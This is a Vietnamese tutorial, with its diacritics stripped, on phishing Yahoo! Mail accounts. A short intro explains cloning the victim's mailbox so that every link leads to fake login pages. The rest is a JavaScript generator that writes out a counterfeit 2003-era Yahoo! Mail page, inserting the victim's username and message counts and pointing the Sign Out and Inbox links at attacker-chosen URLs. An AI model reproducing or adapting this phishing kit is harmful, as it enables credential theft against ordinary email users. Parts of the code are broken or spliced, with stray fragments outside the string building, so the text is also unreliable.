Mail s t ng login li Mail Box va m, do , cch nghi binh u tin l to mt
mail box y ht ca victim, trong tt c cc nt, ng link b thay i n cc
trang gi mo ca mnh.
Cc "cng c" cn c trc tin:
* Bn vo MailBox ca chnh bn, save as n, sau khng cn lm g na, bn ch
cn cc file trong th mc "Yahoo! Mail - Tn bn@yahoo.com_files"
* trang Re_login ca Yahoo! Mail (c khi ta m 2 Mail Box khc nhau)
* trang Return Yahoo! Mail (c c khi ta Sign Out)
<font color="#FF0000">(trong dong` Wellcome...., vi' du. hop thu cua toi la`
Wellcom, Phan)</font></p>
<script>
function gene()
{
r=Math.floor(Math.random()*100000)
K='"'
F="S"
clrar.value+="<!DOCTYPE HTML PUBLIC "+K+"-//W3C//DTD HTML 4.0
Transitional//EN"+K+">\n"
clrar.value+="<!-- saved from
url=(0058)http://us.f137.mail.yahoo.com/ym/login?.rand=84b8k66avhn5g -->\n"
clrar.value+="<!--web13705--><HTML><HEAD><TITLE>Yahoo! Mail "+b1.value+"@yahoo.com</TITLE>\n"
clrar.value+="<META http-equiv=Content-Type content="+K+"text/html;
charset=windows-1252"+K+">\n"
clrar.value+="<script>\n"
clrar.value+="<!-- \n"
clrar.value+="if (typeof top.frames["+K+"wmailmain"+K+"] !=
"+K+"undefined"+K+") {\n"
clrar.value+=" window.open("+K+"http://mail.yahoo.com"+K+",
"+K+"_top"+K+");\n"
clrar.value+="}\n"
clrar.value+="var ypim_color = "+K+"blue"+K+";\n"
clrar.value+="// -->\n"
clrar.value+="</"+F+"CRIPT>\n\n"
clrar.value+="<script src="+K+"ylib_dom.js"+K+"></"+F+"CRIPT>\n\n"
clrar.value+="<script language=JavaScript \n"
clrar.value+="src="+K+"pim.js"+K+"></"+F+"CRIPT>\n\n"
clrar.value+="<script language=JavaScript\n"
clrar.value+="src="+K+"pim_css.js"+K+"></"+F+"CRIPT>\n"
clrar.value+="<NOSCRIPT>\n"
clrar.value+="<META http-equiv=Refresh content="+K+"0; URL=/ym/login?
nojs=1"+K+"></NOSCRIPT>\n"
clrar.value+="<script>\n"
clrar.value+=" var newWin=null;\n"
clrar.value+=" var onscreen=false;\n\n"
clrar.value+=" function NewWin(url,name,xpos,ypos,width,height)\n"
clrar.value+=" {\n"
clrar.value+=" newWin=window.open(\n"
clrar.value+=" url,\n"
clrar.value+=" name,\n"
clrar.value+="
"+K+"screenX="+K+"+xpos+"+K+",screenY="+K+"+ypos+"+K+",WIDTH="+K+"+
width+"+K+",HEIGHT="+K+"+height+"+K+",location=0,resizable=1,status=0,titleb
ar=1,directories=0,toolbar=0,menubar=0,scrollbars=0,status=0"+K+"\n"
clrar.value+=" );\n"
clrar.value+=" newWin.focus();\n"
clrar.value+=" onscreen=true; \n"
clrar.value+=" }\n"
clrar.value+="</"+F+"CRIPT>\n"
clrar.value+="<TD></TD><TD></TD>\n"
clrar.value+="<META content="+K+"Microsoft FrontPage 5.0"+K+"
name=GENERATOR></HEAD>\n"
clrar.value+="<BODY vLink=#0000ff link=#0000ff bgColor=white leftMargin=4
topMargin=4 \n"
clrar.value+="marginheight="+K+"4"+K+" marginwidth="+K+"4"+K+">\n"
clrar.value+="<script>\n"
clrar.value+=" function Help(link)\n"
clrar.value+=" {\n"
clrar.value+="
window.open(link,"+K+"help"+K+","+K+"width=400,height=500,scrollbars=yes,dep
endent=yes"+K+");\n"
clrar.value+=" }\n"
clrar.value+=" if (document.cookie != "+K+""+K+" &&
document.cookie.indexOf("+K+"19AC/A"+K+") == -1) {\n"
clrar.value+=" window.open("+K+"http://mail.yahoo.com"+K+",
"+K+"_top"+K+");\n"
clrar.value+=" }\n"
clrar.value+="</"+F+"CRIPT>\n"
clrar.value+="<!-- begin search masthead -->\n"
clrar.value+="<DIV style="+K+"MARGIN-TOP: -4px"+K+">\n"
clrar.value+="<TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+"
border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR bgColor=#dcdcdc>\n"
clrar.value+=" <TD noWrap colSpan=2 height=4><SPACER height="+K+"1"+K+"
width="+K+"1"+K+" \n"
clrar.value+=" type="+K+"block"+K+"></TD></TR>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD width="+K+"99%"+K+">\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD noWrap colSpan=3 height=3><SPACER height="+K+"1"+K+"
width="+K+"1"+K+" \n"
clrar.value+=" type="+K+"block"+K+"></TD></TR>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD><A href="+K+"http://mail.yahoo.com/"+K+"><IMG height=34
\n"
clrar.value+=" alt="+K+"Yahoo! Mail"+K+" \n"
clrar.value+=" src="+K+"mailma1.gif"+K+" \n"
clrar.value+=" width=250 border=0></A> </TD>\n"
clrar.value+=" <TD noWrap><FONT face=arial size=-1><A \n"
clrar.value+=" href="+K+"http://us.rd.yahoo.com/mail_us/pimnav/welcome/?
http://www.yahoo.com"+K+">Yahoo!</A> \n"
clrar.value+=" - <A \n"
clrar.value+=" href="+K+"http://us.rd.yahoo.com/mail_us/pimnav/welcome/?
http://my.yahoo.com"+K+">My \n"
clrar.value+=" Yahoo!</A> - <A \n"
clrar.value+=" href="+K+"http://us.rd.yahoo.com/mail_us/help/?
http://help.yahoo.com/help/us/mail"+K+">Help</A> \n"
clrar.value+=" </FONT> </TD>\n"
clrar.value+=" <TD align=right>\n"
clrar.value+=" <script language=JavaScript>\n"
clrar.value+="var pb_target="+K+"_blank"+K+";\n"
clrar.value+="var pb_URL = new Array();\n"
clrar.value+="pb_URL[1]="+K+"http://rd.yahoo.com/M=243098.2891634.4238018.
1284474/D=mail/S=150500014:PB/A=1579788/R=0/id=flashurl/SIG=18a42jaeu/*h
ttp://shop.store.yahoo.com/cgi-bin/clink?
hp3+shopping:dmad/M=243098.2891634.4238018.1284474/D=mail/S=150500014:
PB/A=1579788/R=1/1057492859+http://us.rmi.yahoo.com/rmi/http://www.compaq
.com/rmi-framed-url/http://www.compaq.com/bridge/poweredby/smb/indexyahoo.html"+K+";\n"
clrar.value+="var
pb_flashfile="+K+"http://us.a1.yimg.com/us.yimg.com/a/1-/flash/hp/pb/pbhp_84x2
8_blu_yahoomail.swf"+K+";\n"
clrar.value+="var
pb_altURL="+K+"http://rd.yahoo.com/M=243098.2891634.4238018.1284474/D=m
ail/S=150500014:PB/A=1579788/R=2/id=altimgurl/SIG=18a6fp7oj/*http://shop.sto
re.yahoo.com/cgi-bin/clink?
hp3+shopping:dmad/M=243098.2891634.4238018.1284474/D=mail/S=150500014:
PB/A=1579788/R=3/1057492859+http://us.rmi.yahoo.com/rmi/http://www.compaq
.com/rmi-framed-url/http://www.compaq.com/bridge/poweredby/smb/indexyahoo.html"+K+";\n"
clrar.value+="var
pb_altimg="+K+"http://us.a1.yimg.com/us.yimg.com/a/1-/flash/hp/pb/pbhp_84x28
_blu_yahoo.gif"+K+";\n"
clrar.value+="var pb_width=84;\n"
clrar.value+="var pb_height=28;\n"
clrar.value+="var pb_FitNewWinHeight = new Array;\n"
clrar.value+="var pb_FitNewWinWidth = new Array;\n"
clrar.value+="pb_FitNewWinWidth[1] = 790;\n"
clrar.value+="pb_FitNewWinHeight[1] = 590;\n"
clrar.value+=" </"+F+"CRIPT>\n\n"
clrar.value+=" <script language=JavaScript \n"
clrar.value+=" src="+K+"fs_pb_fitted_072002b.js"+K+">\n"
clrar.value+=" </"+F+"CRIPT>\n"
clrar.value+=" <NOSCRIPT>\n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://rd.yahoo.com/M=243098.2891634.4238018.1284474/D=mail/S=
150500014:PB/A=1579788/R=4/id=noscript/SIG=18aib6l1q/*http://shop.store.yah
oo.com/cgi-bin/clink?
hp3+shopping:dmad/M=243098.2891634.4238018.1284474/D=mail/S=150500014:
PB/A=1579788/R=5/1057492859+http://us.rmi.yahoo.com/rmi/http://www.compaq
.com/rmi-framed-url/http://www.compaq.com/bridge/poweredby/smb/indexyahoo.html"+K+" \n"
clrar.value+=" target=_blank><IMG height=28 \n"
clrar.value+=" src="+K+"pbhp_84x28_blu_yahoo.gif"+K+" \n"
clrar.value+=" width=84
border=0></A></NOSCRIPT></TD></TR></TBODY></TABLE></TD>\n"
clrar.value+="<script language=javascript>\n"
clrar.value+="<!-- \n"
clrar.value+=" function init() \n"
clrar.value+=" { \n"
clrar.value+=" if (oBw.ie||oBw.dom) { \n\n"
clrar.value+="
menus \n"
clrar.value+="
clrar.value+="
clrar.value+="
clrar.value+="
clrar.value+="
clrar.value+="
clrar.value+="
clrar.value+="
clrar.value+="
function OnLoad()\n"
{\n"
// noop by default\n"
// redefine as needed\n"
}\n"
clrar.value+=" onload=init\n"
clrar.value+=" //-->\n"
clrar.value+="</"+F+"CRIPT>\n\n"
clrar.value+="<TABLE cellSpacing=0 cellPadding=0 border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD class=tabhi width="+K+"1%"+K+">\n"
clrar.value+=" <TABLE id=mailTb cellSpacing=0 cellPadding=0
width="+K+"100%"+K+" border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD class=tabhia id=mail1>\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+"
border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD><A href="+K+"http://mail.yahoo.com/"+K+"><IMG height=24
\n"
clrar.value+=" alt="+K+"Yahoo! Mail"+K+" hspace=4 \n"
clrar.value+=" src="+K+"mailbr1.gif"+K+" \n"
clrar.value+=" width=24 border=0 name=iconmail></A></TD>\n"
clrar.value+=" <TD class=tabhit noWrap><A \n"
clrar.value+=" href="+K+"http://mail.yahoo.com/"+K+">Mail</A>
</TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=tabhia id=mailBtn vAlign=center><A \n"
clrar.value+=" onclick="+K+"ypim_prepareMail(); return
ypim_showMenu('mail')"+K+" \n"
clrar.value+=" href="+K+"http://mail.yahoo.com/"+K+"><IMG height=24 \n"
clrar.value+=" src="+K+"downbr1.gif"+K+" width=10 \n"
clrar.value+=" border=0
name=arr_mail></A></TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=tablor width="+K+"1%"+K+">\n"
clrar.value+=" <TABLE id=addrTb cellSpacing=0 cellPadding=0
width="+K+"100%"+K+" border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD class=tabloa id=addr1>\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+"
border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD><A href="+K+"http://address.yahoo.com/yab/us"+K+"><IMG
height=24 \n"
clrar.value+=" alt="+K+"Yahoo! Address Book"+K+" hspace=4 \n"
clrar.value+=" src="+K+"abbr1.gif"+K+" \n"
clrar.value+=" width=24 border=0 name=iconaddr></A></TD>\n"
clrar.value+=" <TD class=tablot noWrap><A \n"
clrar.value+=" href="+K+"http://mail.yahoo.com/"+K+">Mail</A>
</TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=tabhia id=mailBtn vAlign=center><A \n"
clrar.value+=" onclick="+K+"ypim_prepareMail(); return
ypim_showMenu('mail')"+K+" \n"
clrar.value+=" href="+K+"http://mail.yahoo.com/"+K+"><IMG height=24 \n"
clrar.value+=" src="+K+"downbr1.gif"+K+" width=10 \n"
clrar.value+=" border=0
name=arr_mail></A></TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=tablor width="+K+"1%"+K+">\n"
clrar.value+=" <TABLE id=addrTb cellSpacing=0 cellPadding=0
width="+K+"100%"+K+" border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD class=tabloa id=addr1>\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+"
border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD><A href="+K+"http://address.yahoo.com/yab/us"+K+"><IMG
height=24 \n"
clrar.value+=" alt="+K+"Yahoo! Address Book"+K+" hspace=4 \n"
clrar.value+=" src="+K+"abbr1.gif"+K+" \n"
clrar.value+=" width=24 border=0 name=iconaddr></A></TD>\n"
clrar.value+=" <TD class=tablot noWrap><A \n"
clrar.value+=" href="+K+"http://address.yahoo.com/yab/us"+K+">Addresses</A>
</TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=tabloa id=addrBtn vAlign=center><A \n"
clrar.value+=" onclick="+K+"ypim_prepareAddr(); return
ypim_showMenu('addr')"+K+" \n"
clrar.value+=" href="+K+"http://address.yahoo.com/yab/us"+K+"><IMG height=24
\n"
clrar.value+=" src="+K+"downbr1.gif"+K+" width=10 \n"
clrar.value+=" border=0
name=arr_addr></A></TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=tablor width="+K+"1%"+K+">\n"
clrar.value+=" <TABLE id=calTb cellSpacing=0 cellPadding=0
width="+K+"100%"+K+" border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD class=tabloa id=cal1>\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+"
border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+="<TD><A href="+K+"http://calendar.yahoo.com/"+K+"><IMG
height=24 \n"
clrar.value+=" alt="+K+"Yahoo! Calendar"+K+" hspace=4 \n"
clrar.value+=" src="+K+"calbr1.gif"+K+" \n"
clrar.value+=" width=24 border=0 name=iconcal></A></TD>\n"
clrar.value+=" <TD class=tablot noWrap><A \n"
clrar.value+=" href="+K+"http://calendar.yahoo.com/"+K+">Calendar</A>
</TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=tabloa id=calBtn vAlign=center><A \n"
clrar.value+=" onclick="+K+"ypim_prepareCal(); return
ypim_showMenu('cal')"+K+" \n"
clrar.value+=" href="+K+"http://calendar.yahoo.com/"+K+"><IMG height=24 \n"
clrar.value+=" src="+K+"downbr1.gif"+K+" width=10 \n"
clrar.value+=" border=0
name=arr_cal></A></TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=tablor width="+K+"1%"+K+">\n"
clrar.value+=" <TABLE id=noteTb cellSpacing=0 cellPadding=0
width="+K+"100%"+K+" border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD class=tabloa id=note1>\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+"
border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD><A href="+K+"http://notepad.yahoo.com/"+K+"><IMG
height=24 \n"
clrar.value+=" alt="+K+"Yahoo! Notepad"+K+" hspace=4 \n"
clrar.value+=" src="+K+"npdbr1.gif"+K+" \n"
clrar.value+=" width=24 border=0 name=iconnote></A></TD>\n"
clrar.value+=" <TD class=tablot noWrap><A \n"
clrar.value+=" href="+K+"http://notepad.yahoo.com/"+K+">Notepad</A>
</TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=tabloa id=noteBtn vAlign=center><A \n"
clrar.value+=" onclick="+K+"ypim_prepareNote(); return
ypim_showMenu('note')"+K+" \n"
clrar.value+=" href="+K+"http://notepad.yahoo.com/"+K+"><IMG height=24 \n"
clrar.value+=" src="+K+"downbr1.gif"+K+" width=10 \n"
clrar.value+=" border=0
name=arr_note></A></TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=tabnone align=right
width="+K+"95%"+K+"><B>"+b1.value+"@yahoo.com</B> [<A \n"
clrar.value+=" href="+K+""+b3.value+""+K+">Sign \n"
clrar.value+=" Out</A>] </TD></TR></TBODY></TABLE>\n"
clrar.value+="<TABLE cellSpacing=0 cellPadding=4 width="+K+"100%"+K+"
border=0>\n"
clrar.value+=" <TBODY>\n"
150500014:SW4/A=1642781/R=1/SIG=12hdrnou3/*http://www.gotomypc.com/u/tr
/yh/cpm/mail/SW4/25chtext10/PC?Target=mm/g22lp.tmpl"+K+" \n"
clrar.value+=" target=_blank><FONT size=2>Access Your Office <BR>Files from \n"
clrar.value+=" Home</FONT></A> \n"
clrar.value+=" </TD></TR></TBODY></TABLE><!--X-></P></TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=bgd width=8 bgColor=#9bbad6><IMG height=2 \n"
clrar.value+=" src="+K+"space.gif"+K+" width=8></TD>\n"
clrar.value+=" <TD vAlign=top>\n"
clrar.value+="<TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+"
border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD bgColor=white>\n"
clrar.value+=" <DIV class=bgd style="+K+"WIDTH: 5px; HEIGHT: 5px"+K+"><IMG
height=5 \n"
clrar.value+=" src="+K+"rdul1.gif"+K+" \n"
clrar.value+=" width=5></DIV></TD></TR></TBODY></TABLE>\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=4 width="+K+"100%"+K+"
bgColor=white border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD vAlign=top>\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=4 width="+K+"100%"+K+"
border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD class=mtitle colSpan=2>Welcome, "+b7.value+"
</TD></TR>\n"
clrar.value+=" <TR vAlign=top>\n"
clrar.value+=" <TD align=middle width=28><IMG height=18 \n"
clrar.value+=" src="+K+"newmail1.gif"+K+" \n"
clrar.value+=" width=28> </TD>\n"
clrar.value+=" <TD vAlign=top>You have <B>"+b6.value+" unread
messages</B>:<BR><B><A \n"
clrar.value+=" href="+K+""+b2.value+""+K+">Inbox
("+b4.value+")</A></B>, \n"
clrar.value+=" <B><A \n"
clrar.value+=" href="+K+""+b2.value+""+K+">Bulk
("+b5.value+")</A></B> \n"
clrar.value+=" </TD></TR>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD colSpan=2 height=5><IMG height=5 \n"
clrar.value+=" src="+K+"space.gif"+K+" \n"
clrar.value+=" width=1></TD></TR></TBODY></TABLE>\n"
clrar.value+=" <TABLE cellSpacing=6 cellPadding=0 border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD vAlign=top><IMG height=16 \n"
clrar.value+=" src="+K+"bulb1.gif"+K+" \n"
clrar.value+=" width=16> </TD>\n"
clrar.value+=" <TD><B>Today's tip: </B>Before you click "+K+"Send,"+K+" ask
yourself \n"
clrar.value+=" if each and every recipient will want to read your \n"
clrar.value+=" email.</TD></TR></TBODY></TABLE>\n"
clrar.value+=" <CENTER>\n"
clrar.value+=" <DIV class=bgd style="+K+"MARGIN: 8px; WIDTH: 90%; HEIGHT:
1px"+K+"><SPACER \n"
clrar.value+=" height="+K+"1"+K+" width="+K+"1"+K+"
type="+K+"block"+K+"></DIV></CENTER>\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=4 width="+K+"100%"+K+"
border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD>\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+" \n"
clrar.value+=" bgColor=#ffffff border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+="<TD width=68><A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com//mail_us/upgrade/evt=8754/*http://mailplus.m
ail.yahoo.com/mp_splash_launch.php?b=lv"+K+" \n"
clrar.value+=" target=_blank><IMG height=60 \n"
clrar.value+=" src="+K+"sp_storage60_1.gif"+K+" \n"
clrar.value+=" width=68 border=0></A></TD>\n"
clrar.value+=" <TD noWrap> </TD>\n"
clrar.value+=" <TD vAlign=top><A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com//mail_us/upgrade/evt=8754/*http://mailplus.m
ail.yahoo.com/mp_splash_launch.php?b=lv"+K+" \n"
clrar.value+=" target=_blank><IMG height=18 \n"
clrar.value+=" src="+K+"hd_storage_1.gif"+K+" \n"
clrar.value+=" width=220 vspace=3 border=0></A><BR>For those of you who \n"
clrar.value+=" can't throw anything away. <NOBR><B><A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com//mail_us/upgrade/evt=8754/*http://mailplus.m
ail.yahoo.com/mp_splash_launch.php?b=lv"+K+" \n"
clrar.value+=" target=_blank>Learn \n"
clrar.value+=" more</A></B></NOBR></TD></TR></TBODY></TABLE><BR>\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=1 width=300 bgColor=#057ebc
\n"
clrar.value+=" border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <FORM style="+K+"MARGIN-TOP: 0px; MARGIN-BOTTOM:
0px"+K+" \n"
clrar.value+="
action=http://pa.yahoo.com/*http://rd.yahoo.com/personals/ext/evt=8120/*http://
personals.yahoo.com/display \n"
clrar.value+=" target=_blank><INPUT type=hidden value=mantle \n"
clrar.value+=" name=frommod><INPUT type=hidden value=table \n"
clrar.value+=" name=ct_hft><INPUT type=hidden value=-dregion- \n"
clrar.value+=" name=cr><INPUT type=hidden value=2 name=advs><INPUT \n"
clrar.value+=" type=hidden value=1 name=form><INPUT type=hidden value=0 \n"
border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR vAlign=top bgColor=#ffffff>\n"
clrar.value+=" <TD align=middle><FONT face=arial size=-2><A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://address.yahoo.com/"+K+">Addre
ss Book</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://auctions.yahoo.com/"+K+">Aucti
ons</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://autos.yahoo.com/"+K+">Autos</
A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://briefcase.yahoo.com/"+K+">Brief
case</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://calendar.yahoo.com/"+K+">Calen
dar</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://chat.yahoo.com/"+K+">Chat</A
> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://classifieds.yahoo.com/"+K+">Cla
ssifieds</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://finance.yahoo.com/"+K+">Financ
e</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://games.yahoo.com/"+K+">Games
</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://geocities.yahoo.com/"+K+">Geoc
ities</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://greetings.yahoo.com/"+K+">Gre
etings</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://groups.yahoo.com/"+K+">Groups
</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://health.yahoo.com/"+K+">Health
</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://astrology.yahoo.com/yastro/"+K+
">Horoscopes</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://hotjobs.yahoo.com/"+K+">HotJo
bs</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://www.yahooligans.com/"+K+">Kid
s</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://mail.yahoo.com/"+K+">Mail</A>
\n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://maps.yahoo.com/"+K+">Maps</
A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://members.yahoo.com/"+K+">Me
mber Directory</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://messenger.yahoo.com/"+K+">Me
ssenger</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://mobile.yahoo.com/"+K+">Mobile
</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://movies.yahoo.com/"+K+">Movies
</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://launch.yahoo.com/"+K+">Music<
/A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://my.yahoo.com/"+K+">My
Yahoo!</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://news.yahoo.com/"+K+">News</
A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://paydirect.yahoo.com/"+K+">Pay
Direct</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://personals.yahoo.com/"+K+">Pers
onals</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://pets.yahoo.com/"+K+">Pets</A>
\n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://photos.yahoo.com/"+K+">Photos
</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://platinum.yahoo.com/"+K+">Plati
num</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://shopping.yahoo.com/"+K+">Sho
pping</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://sports.yahoo.com/"+K+">Sports
</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://tv.yahoo.com/"+K+">TV</A>
\n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://travel.yahoo.com/"+K+">Travel<
/A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://weather.yahoo.com/"+K+">Weat
her</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://yp.yahoo.com/"+K+">Yellow&nbs
p;Pages</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://docs.yahoo.com/docs/family/mor
e.html"+K+">more...</A></FONT></TD></TR></TBODY></TABLE></TD></TR>
</TBODY></TABLE><!-- SpaceID=150500014 loc=FOOT noad -->\n"
clrar.value+="<script language=javascript> var ADFadids =
"+K+"1522466,1522468,1453288,1453290,1579788,1643659,1455139,1657277,16
42781,1642149,1544483,1052425"+K+"; function ADFlaunch() {var w; var
l="+K+"http://rd.yahoo.com/M=224039.2020109.3495275.1958505/D=mail/S=150
500014:FOOT2/A=1052425/R=0/id=adfeedback/SIG=12ecvkvil/*http://promo.yaho
o.com/adfeedback/?
page=150500014:FOOT2&property=mail&adids="+K+"+ADFadids;
w=window.open(l,"+K+"AdFeedbackWin"+K+","+K+"toolbar=no,scrollbars=yes,resi
zable,location=no,height=400,width=640"+K+"); }</"+F+"CRIPT>\n"
clrar.value+="<CENTER><SMALL><BR>Copyright 1994-2003 <A \n"
clrar.value+="href="+K+"http://rd.yahoo.com/M=224039.2020109.3495275.19585
05/D=mail/S=150500014:FOOT2/A=1052425/R=1/SIG=11n7g195d/*http://rd.yaho
o.com/mail_us/tos/?http://www.yahoo.com"+K+" \n"
clrar.value+="target=_blank>Yahoo!</A> Inc. All rights reserved. <A \n"
clrar.value+="href="+K+"http://rd.yahoo.com/M=224039.2020109.3495275.19585
05/D=mail/S=150500014:FOOT2/A=1052425/R=2/SIG=1136qnvkg/*http://docs.ya
hoo.com/info/terms/"+K+">Terms \n"
clrar.value+="of Service</A> - <A \n"
clrar.value+="href="+K+"http://rd.yahoo.com/M=224039.2020109.3495275.19585
05/D=mail/S=150500014:FOOT2/A=1052425/R=3/SIG=11lp7krrc/*http://docs.yah
oo.com/info/copyright/copyright.html"+K+">Copyright \n"
clrar.value+="Policy</A> - <A \n"
clrar.value+="href="+K+"http://rd.yahoo.com/M=224039.2020109.3495275.19585
05/D=mail/S=150500014:FOOT2/A=1052425/R=4/SIG=11he80eif/*http://docs.yah
oo.com/info/guidelines/mail.html"+K+">Guidelines</A> \n"
clrar.value+="- <A href="+K+"javascript:ADFlaunch()"+K+">Ad
Feedback</A><BR>NOTICE: We collect \n"
clrar.value+="personal information on this site.<BR>To learn more about how we
use your \n"
clrar.value+="information, see our <A \n"
